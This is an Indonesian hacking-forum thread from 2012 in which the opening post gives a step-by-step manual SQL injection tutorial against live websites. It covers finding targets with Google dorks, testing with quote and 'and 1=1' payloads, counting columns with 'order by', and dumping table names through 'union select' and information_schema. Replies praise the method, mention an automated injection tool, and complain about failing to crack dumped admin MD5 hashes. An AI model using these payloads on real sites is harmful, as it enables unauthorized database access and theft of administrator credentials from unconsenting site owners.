.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 SQL Injection Art

Go down 
4 posters
PengirimMessage
zer0cool
Newbie - Hack
Newbie - Hack
zer0cool


Jumlah posting : 363
Points : 807
Reputation : 24
Join date : 22.06.11

SQL Injection Art Empty
PostSubyek: SQL Injection Art   SQL Injection Art Icon_minitimeFri Jun 01, 2012 8:29 pm

SQL Injectin adalah seni hacking dengan memanfaatkan dan memanipulasi perintah-perintah dari SQL itu sendiri.

1. Cari Target Mungkin anda bisa mencari link yang kayak gini : "http://www.sasaran.com/index.php?id=9", atau cari aja di google bisa kayak gini "inurl:index.php" ato "inurl:index.php?id=" ato yang lain deh terserah, pokoknya dapet target.

contoh pesan bug : You have an error in your SQL syntax

2. Test Bug tambahkan tanda petik (') di akhir URL, contoh : [You must be registered and logged in to see this link.]

gunakan perintah and+1=1-- ndi akhir url bila isinya tetap ada berarti coba lagi dengan and+1=2-- bila ga tampil brarti bisa di buat percobaan tuh webnya

3. Cari Table gunakan perintah "+order+by+" contoh : "http://www.sasaran.com/index.php?id=9+order+by+1"bila sampai order by 7 pesan kesalahan tidak hilang, namun order by 8 pesan kesalahannya hilang , berarti columbnya antara 1-7, namun masih harus di cari table berapa.

4. cari columb yang bisa di inject "+union+select+"contoh : "http://www.sasaran.com/index.php?id=9+union+select+1,2,3,4,5,6,7--" n ganti para meternya dari 9 menjadi -9"http://www.sasaran.com/index.php?id=9+union+select+1,2,3,4,5,6,7--"

cari sendiri pesannya,.!!

5. Intip Isi Website

[You must be registered and logged in to see this link.] bila kesalahan di columb 3

Cari versi my sQL

[You must be registered and logged in to see this link.] tergantung pesan kesalahan sebelumnya

bila muncul sql ver.5 itu lebih baik karena kita bisa menggunakan perintah "From+Information_schema", bila di ver.4 kita harus menebak table dan columbnya.

Tips:Injeksi Columb lebih dari 1 perintah

concat(perintah1,perintah2)

Menampilkan Table di web sasaran

gunakan :Group_concat(table_name) = digantikan pada anga yang keluar tadifrom+information_schema.tables-- = masukkan setelah angka terakhir

[You must be registered and logged in to see this link.]

bila kesalahan di table 3

Lanjutkan Sendiri..., :DUse Your Brain..,

Converternya : [You must be registered and logged in to see this link.]
Kembali Ke Atas Go down
Admirer
VIP Member
VIP Member
Admirer


Jumlah posting : 102
Points : 123
Reputation : 7
Join date : 11.12.11
Age : 34
Lokasi : Earth (N.K.R.I)

SQL Injection Art Empty
PostSubyek: Re: SQL Injection Art   SQL Injection Art Icon_minitimeSat Jun 02, 2012 2:55 am

nice share kk...
ni cara manualnya ya kk...
kalau pake havij manteb juga tu .... SQL Injection Art 37346
Kembali Ke Atas Go down
zer0cool
Newbie - Hack
Newbie - Hack
zer0cool


Jumlah posting : 363
Points : 807
Reputation : 24
Join date : 22.06.11

SQL Injection Art Empty
PostSubyek: Re: SQL Injection Art   SQL Injection Art Icon_minitimeSat Jun 02, 2012 10:43 pm

itu cara sqli metode baru kaka SQL Injection Art 3529815765
Kembali Ke Atas Go down
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 32
Lokasi : /home/root/blackc0de

SQL Injection Art Empty
PostSubyek: Re: SQL Injection Art   SQL Injection Art Icon_minitimeSat Jun 02, 2012 11:21 pm

keren-keren :jempol
Kembali Ke Atas Go down
http://zer03s.blog.com/
black.bottle
Top Nubie
Top Nubie
black.bottle


Jumlah posting : 34
Points : 38
Reputation : 0
Join date : 03.07.12
Age : 38

SQL Injection Art Empty
PostSubyek: Re: SQL Injection Art   SQL Injection Art Icon_minitimeTue Jul 03, 2012 9:01 am

:mngiler: bete tiap bisa masuk db login adminnya md5 hashnya gagal mulu gak bisa login :mpusing:
Kembali Ke Atas Go down
Sponsored content





SQL Injection Art Empty
PostSubyek: Re: SQL Injection Art   SQL Injection Art Icon_minitime

Kembali Ke Atas Go down
 
SQL Injection Art
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» SQL injection v5
» CMS 4.x.x Zorder (SQL Injection Vul)
» JavaScript Injection
» SQL injection For Beginner :)
» Marinet SQL Injection

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Web attack-
Navigasi: